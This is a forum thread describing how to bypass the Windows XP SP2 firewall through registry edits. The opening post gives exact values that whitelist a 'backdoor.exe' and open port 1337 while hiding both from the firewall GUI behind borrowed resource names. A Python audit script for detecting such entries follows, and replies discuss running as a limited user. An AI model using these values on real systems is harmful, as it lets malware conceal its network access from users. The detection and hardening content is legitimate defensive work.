
TOPIC: Bypassing Windows Firewall, XP SP2 example

Bypassing Windows Firewall, XP SP2 example 11 years 5 months ago #9121

  • ping
  • Distinguished Member
  • Posts: 181
  • Karma: 0
Recently I found this way to bypass the Windows XP SP2 built-in firewall. This is strictly for educational purposes. So, here it goes:

We can bypass the Windows Firewall using the registry.

Just open regedit.exe and go to:
[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List[/code:1]

As you can see, the SharedAccess service (aka Windows Firewall) stores the names of the applications allowed for outbound connections.

To give access to the desired application we need to add a similar key:
[code:1]"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled"[/code:1]

But then our "backdoor" will be listed in the firewall GUI's allowed applications.

Anyway, we may hide it by making it like this:
[code:1]"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"[/code:1]

We can also globally open any port we want, under:

[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List[/code:1]

by adding a similar value inside this registry key:
[code:1]"1337:TCP"="1337:TCP:*:Enabled:Name"[/code:1]

Where "Name" is the name we want to be shown in the GUI.

To hide the port from the GUI listing we may make something like this:

[code:1]"1337:TCP"="1337:TCP:*:Enabled:@xpsp2res.dll,-22003"[/code:1]

and then the port will be hidden from the listing (XP SP2).

It works on XP SP2; I haven't tested it on any other OS.

This method is used by some malware/spyware manufacturers, and together with a rootkit it may be really dangerous.
The greatest pleasure in life is doing what people say you can not do..!!
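The two List keys above hold one REG_SZ value per exception, and the display name at the end of each value may be an `@dll,-id` resource reference that the firewall GUI resolves into a localized string. Windows' own built-in exceptions use the same form, so an entry whose name is a resource reference is not by itself a sign of tampering; what gives the disguised entry away is a program path or port that is not in a known-good baseline. The following audit is an added example and is not code from the post: it parses both value formats (the program path contains a colon, so a plain split on `:` breaks it), flags enabled entries that are outside a caller-supplied baseline, and can read the live keys through the standard-library `winreg` module on Windows. The sample values, the baseline paths and ports, and the helper names are all constructed for the demo.

```python
"""Audit the XP SP2 firewall exception lists for disguised entries.

Added example; not code from the forum post. The sample registry values
and the baseline of expected entries are constructed for this demo.
The live reader uses the standard-library winreg module (Windows only).
"""
import re

POLICY = r"SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile"
APPS_LIST = POLICY + r"\AuthorizedApplications\List"
PORTS_LIST = POLICY + r"\GloballyOpenPorts\List"

# XP SP2 REG_SZ formats (value name -> data):
#   apps : "<path>"         = "<path>:<scope>:<Enabled|Disabled>:<display name>"
#   ports: "<port>:<proto>" = "<port>:<proto>:<scope>:<Enabled|Disabled>:<display name>"
# The path contains a colon ("C:\..."), so a plain split(":") mangles app entries.
_APP_RE = re.compile(
    r"^(?P<path>(?:[A-Za-z]:)?[^:]*):(?P<scope>[^:]*):(?P<state>Enabled|Disabled)"
    r"(?::(?P<name>.*))?$", re.IGNORECASE)
_PORT_RE = re.compile(
    r"^(?P<port>\d+):(?P<proto>TCP|UDP):(?P<scope>[^:]*):(?P<state>Enabled|Disabled)"
    r"(?::(?P<name>.*))?$", re.IGNORECASE)


def parse_app_entry(value_name, data):
    m = _APP_RE.match(data)
    if not m:
        raise ValueError("bad AuthorizedApplications entry: %r" % data)
    e = m.groupdict()
    e["name"] = e["name"] or ""
    e["value_name"] = value_name
    return e


def parse_port_entry(value_name, data):
    m = _PORT_RE.match(data)
    if not m:
        raise ValueError("bad GloballyOpenPorts entry: %r" % data)
    e = m.groupdict()
    e["name"] = e["name"] or ""
    e["port"] = int(e["port"])
    e["proto"] = e["proto"].upper()
    e["value_name"] = value_name
    return e


def is_resource_name(name):
    # "@xpsp2res.dll,-22019": the GUI shows the string loaded from that DLL
    # resource, not the literal text, so the entry borrows a built-in label.
    return name.startswith("@")


def audit(app_values, port_values, baseline_paths, baseline_ports):
    """Return [(value_name, reason), ...] for entries that deserve a look.

    Built-in exceptions also carry @dll,-id display names, so a resource
    name only matters when the path or port is outside the caller's baseline.
    """
    findings = []
    known_paths = {p.lower() for p in baseline_paths}
    for value_name, data in app_values.items():
        e = parse_app_entry(value_name, data)
        if e["path"].lower() != value_name.lower():
            findings.append((value_name, "value name and path in data differ"))
        if e["state"].lower() == "enabled" and e["path"].lower() not in known_paths:
            why = "unknown program allowed"
            if is_resource_name(e["name"]):
                why += " under borrowed resource name %s" % e["name"]
            findings.append((value_name, why))
    for value_name, data in port_values.items():
        e = parse_port_entry(value_name, data)
        if e["state"].lower() == "enabled" and (e["port"], e["proto"]) not in baseline_ports:
            why = "unexpected port %d/%s open, scope %s" % (e["port"], e["proto"], e["scope"])
            if is_resource_name(e["name"]):
                why += ", borrowed resource name %s" % e["name"]
            findings.append((value_name, why))
    return findings


def read_list(subkey):
    """Read one List key from the live registry into {value name: data} (Windows only)."""
    import winreg
    values = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:
                break
            values[name] = data
            index += 1
    return values


# Constructed sample data: one legitimate entry and the post's entry in each list.
SAMPLE_APPS = {
    r"C:\Program Files\Messenger\msmsgs.exe":
        r"C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger",
    r"C:\WINDOWS\system32\backdoor.exe":
        r"C:\WINDOWS\system32\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019",
}
SAMPLE_PORTS = {
    "139:TCP": "139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004",
    "1337:TCP": "1337:TCP:*:Enabled:@xpsp2res.dll,-22003",
}
# Assumed baseline for the demo host; on a real host, build it from a clean image.
BASELINE_PATHS = {r"C:\Program Files\Messenger\msmsgs.exe"}
BASELINE_PORTS = {(139, "TCP"), (445, "TCP"), (137, "UDP"), (138, "UDP")}

if __name__ == "__main__":
    for value_name, reason in audit(SAMPLE_APPS, SAMPLE_PORTS, BASELINE_PATHS, BASELINE_PORTS):
        print("%-40s %s" % (value_name, reason))
```

On a live XP SP2 box, replace the sample dicts with `read_list(APPS_LIST)` and `read_list(PORTS_LIST)`; the audit keys on path and port rather than on the display name precisely because the resource-name trick makes the name untrustworthy.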

Ports 11 years 5 months ago #9123

  • TheBishop
  • Moderator
  • Posts: 1719
  • Thank you received: 8
  • Karma: 5
Ouch! That's worth knowing

Re: Bypassing Windows Firewall, XP SP2 example 11 years 5 months ago #9126

  • nske
  • Expert Member
  • Posts: 613
  • Karma: 0
Well, of course, from an administrator account everything's possible! The firewall's rules had to be stored somewhere after all. :)
The above would not work in a limited account, since access to the registry is prohibited.

It's nice that you described this though, if nothing else to demonstrate how easily malware can reconfigure the Windows firewall to let itself out, and how many more considerations there are to take when logged in as an administrator!

Re: Bypassing Windows Firewall, XP SP2 example 11 years 5 months ago #9128

  • DaLight
  • Honored Member
  • Posts: 1302
  • Karma: 1
I second nske's comments. I run all my users in non-admin mode at work and at home! This, I believe, is the major reason behind spyware infections. Obviously this problem mainly exists in the Windows world, where people are not so familiar with the concept of root and limited user accounts.

Re: Bypassing Windows Firewall, XP SP2 example 11 years 5 months ago #9131

  • nske
  • Expert Member
  • Posts: 613
  • Karma: 0
Well, since Microsoft likes to push users in the direction it wants in everything (default software, default settings, etc.), it would be a good idea to encourage this and some other security-conscious decisions during the installation.
After all, nobody would complain about having to log in again each time they need to install some new software or configure something, the way they complain now about having an unusable malware-infected system; besides, the procedure could be more transparent, not requiring the current login session to be disrupted. ;)

PS. And afterwards they could even patent this idea and sue the Linux community for billions! :lol:
